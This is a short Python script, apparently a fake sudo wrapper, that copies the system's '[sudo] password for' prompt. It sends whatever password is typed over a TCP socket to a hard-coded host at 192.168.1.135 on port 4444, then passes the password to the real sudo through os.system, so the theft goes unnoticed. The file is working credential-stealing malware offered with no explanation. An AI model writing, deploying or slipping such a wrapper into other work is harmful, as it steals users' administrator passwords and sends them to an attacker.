#!/usr/bin/env python3
import os
from getpass import getpass
import socket
from sys import argv

user = os.getlogin()

def sendPass(address:tuple[str, int], data:str):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(address)
    s.send(data.encode())
    s.close()

def main():
    command = " ".join(argv[1:])
    p = getpass(f"[sudo] password for {user}: ")
    sendPass(("192.168.1.135", 4444), p)
    os.system(f"echo {p} | sudo -S {command}")

if __name__ == '__main__':
    main()
